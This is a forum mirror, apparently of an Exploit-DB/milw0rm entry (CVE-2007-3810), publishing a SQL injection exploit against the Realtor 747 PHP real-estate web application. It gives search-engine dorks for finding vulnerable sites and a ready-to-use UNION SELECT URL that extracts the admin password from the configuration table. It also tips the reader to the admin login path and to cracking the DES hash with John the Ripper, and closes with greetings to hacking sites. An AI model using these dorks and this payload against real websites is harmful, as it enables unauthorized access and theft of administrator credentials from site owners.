- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4184
- Проверка EDB
-
- Пройдено
- Автор
- T0PP8UZZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3810
- Дата публикации
- 2007-07-14
Код:
--==+================================================================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://www.it747.com/realtor747
DORK: inurl:"index.php?pageid=" Property Listings
DORK 2: inurl:"realtor747"
DESCRIPTION:
pullout admin password from database
EXPLOITS:
http://server.com/realtor747/index.php?pageid=2&categoryid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/FROM/**/AD747_CONFIG%20where/**/config_key=0x70617373776F7264/*
NOTE/TIP:
admin login is at /admin/
password is encrypted in DES, use JTR
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
--==+================================================================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-07-14]
- Источник
- www.exploit-db.com